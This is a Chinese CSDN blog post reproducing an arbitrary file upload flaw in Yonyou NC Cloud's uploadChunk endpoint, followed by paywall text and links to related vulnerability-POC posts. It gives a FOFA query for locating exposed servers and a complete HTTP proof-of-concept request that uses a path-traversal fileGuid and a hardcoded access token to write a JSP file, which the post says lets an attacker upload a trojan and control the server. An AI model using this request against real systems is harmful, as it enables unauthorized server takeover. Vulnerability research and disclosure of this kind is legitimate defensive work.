用友_nccload_uploadchunk文件上传漏洞(含批量验证poc)

已于 2024-04-17 16:09:41 修改
阅读量256 收藏
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全 网络
于 2024-04-17 16:09:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137877252
版权

漏洞描述

用友NC Cloud uploadChunk文件存在任意文件上传漏洞,攻击者通过此漏洞可实现上传木马文件,控制服务器。

image.png

漏洞复现

fofa语法:app=”用友-NC-Cloud”
POC:

POST /ncchr/pm/fb/attachment/uploadChunk?fileGuid=/../../../nccloud/&chunk=1&chunks=1 HTTP/1.1
Host: 
Content-Type: multipart/form-data; boundary=024ff46f71634a1c9bf8ec5820c26fa9
accessTokenNcc: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyaWQiOiIxIn0.F5qVK-ZZEgu3WjlzIANk2JXwF49K5cBruYMnIOxItOQ
Content-Length: 170

--024ff46f71634a1c9bf8ec5820c26fa9
Content-Disposition: form-data; name="file"; filename="test.txt"

<% out.print("hello");%>
--024ff46f71634a1c9bf8ec5820c26fa9--

了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 11
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
网神 SecGate 3600 防火墙两处接口文件批量验证poc
weixin_43567873的博客
04-05 50
网神 SecGate 3600 防火墙两处接口文件批量验证poc
致远OA文件漏洞(批量检测POC)
热门推荐
今天是几号的博客
03-21 1万+
由于致远OA旧版本某些接口存在未授权访问,以及部分函数存在过滤不足,攻击者通过构造恶意请求,可在无需登录的情况下上恶意脚本文件,从而控制服务器。致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3。致远OA A6、A8、A8N (V8.0SP2,V8.1,V8.1SP1)致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3。致远OA G6、G6N (V8.1、V8.1SP1)。致远OA V6.0、V6.1SP1、V6.1SP2。致远OA V7.1、V7.1SP1。
spon IP网络对讲广播系统任意文件漏洞批量验证poc)(1)
2401_83973995的博客
04-14 422
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Pocsuite编写ActiveMQ任意文件漏洞脚本
qq_40997679的博客
10-07 430
想了解更多Pocsuite脚本、请关注微信公众号【白猫学安全】
禅道CMS文件漏洞(CNVD-C-2020-121325)
chaojixiaojingang
10-30 9914
1.影响版本 <=12.4.2 2.漏洞描述 禅道CMS<=12.4.2版本存在文件漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。 3.漏洞POC 1)http://[目标地址]/www/client-download-[$version参数]-[base64加密后的恶意文件地址].html 2)http:// [目标地址] /www/index.php?m=clie...
POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配
09-21
标题中的“POC.rar_POC_POC in matlab_poC filter_poc匹配_曲线匹配”揭示了这个压缩包的内容主要涉及POC(Proof of Concept)在MATLAB环境中的应用,特别是关于POC过滤器和POC匹配算法,以及利用这些方法进行ROC...
POC.rar_POC_POC VH_POC VHDL_POC控制器_VHDL Printer
09-24
而“VHDL”文件很可能包了实际的VHDL源代码,这些代码定义了POC控制器的逻辑结构和操作行为。 设计这样一个VHDL控制器,设计者需要考虑以下关键点: 1. **接口定义**:明确CPU和打印机之间的信号接口,包括数据线...
POC.rar_POC_POC VHDL_VHDL POC_VHDL Printer_poc东南大学
09-24
在本项目中,我们主要探讨的是一个名为"POC.rar"的压缩包文件,它包了与数字系统设计相关的实验内容,特别是使用VHDL(VHSIC Hardware Description Language)编程语言来实现一个Printer接口,该接口能与CPU进行...
poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc
09-22
标题中的“poc.rar_POC_POC VH_poc控制_poc红绿灯程序_vhdl 实现poc”提到了一个VHDL实现的POC(Proof of Concept)项目,它是一个简单的控制程序,可能是针对红绿灯系统的模拟。这个项目主要关注如何用VHDL来构建和...
POC.rar_POC_VHDL poc设计
09-20
标题中的“POC.rar_POC_VHDL poc设计”表明这是一个使用VHDL语言编写的POC(Proof of Concept)项目,重点在于实现并行输出控制器。POC通常是在硬件设计中用来验证某个概念或功能可行性的小型原型系统。VHDL是一种...
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
enjoyscm UploadFile任意文件漏洞
m0_49360718的博客
02-25 529
enjoyscm UploadFile任意文件漏洞
文件漏洞(初学者专用)
weixin_59114667的博客
02-25 362
文件漏洞是指用户上了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力文件本身是一个正常的业务需求,对于很多网站来说,需要用户将文件到服务器文件本身是没有问题的,出现问题的地方在于服务器怎么处理、解释文件所以,攻击者在利用上漏洞时,通常会与Web容器的解析漏洞配合在一起。这里我们先了解一下什么是解析漏洞
文件漏洞知识总结
二狗的博客
03-08 417
国光有一台 XPS15 里面运行着 macOS 和 Ubuntu 双系统,其中 XPS 主要系统就是 Ubuntu,国光在 Ubuntu里面搭建了一个离线的 CTFd 里面还运行着 Docker、宝塔。基本上很多服务都可以在我的 XPS 上运行起来了,出去讲课的时候会带着我的 XPS 和MBP 一起,离线靶场一开美滋滋,更关键的是往自己的靶场里面填充题目有一种养成游戏的感觉,很有成就感。
phpcms_V9任意文件poc
soldier_wing的博客
06-30 1449
使用方法:先编译 javac -encoding UTF-8 Main.java 然后运行 java Main URL(http://www.xxxx.com) import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.io.OutputStream
typescript 调用JavaScript
前端小白的逆袭
09-24 1262
把js文件放到src/assets目录下。例如我的js文件为 remogeo.js 在src目录下的index.html中增加如下语句: 下面是我的 interactive.js中代码: function JSGoBack(tit, status) { // 返回按钮类 this._tit = tit; this._status = status; } JSGoBack.prototype = { _getValue: function () { conso..
用友NC Cloud存在前台远程命令执行漏洞POC软件
nnn2188185的博客
07-24 774
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。
用友_NCCloud_queryStaffByName接口SQL注入(批量验证poc
最新发布
weixin_43567873的博客
04-15 48
用友_NCCloud_queryStaffByName接口SQL注入(批量验证poc
漏洞复现 POC 综合
qq_56895879的博客
08-14 949
漏洞复现
写一个关于文件漏洞poc
02-21
我可以写一个关于文件漏洞POC:步骤1:检查页面是否允许用户上指定文件类型。步骤2:尝试上恶意文件,查看是否可以绕过安全检查。步骤3:如果文件成功,则验证服务器端是否有漏洞,如果有,则可以执行任意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值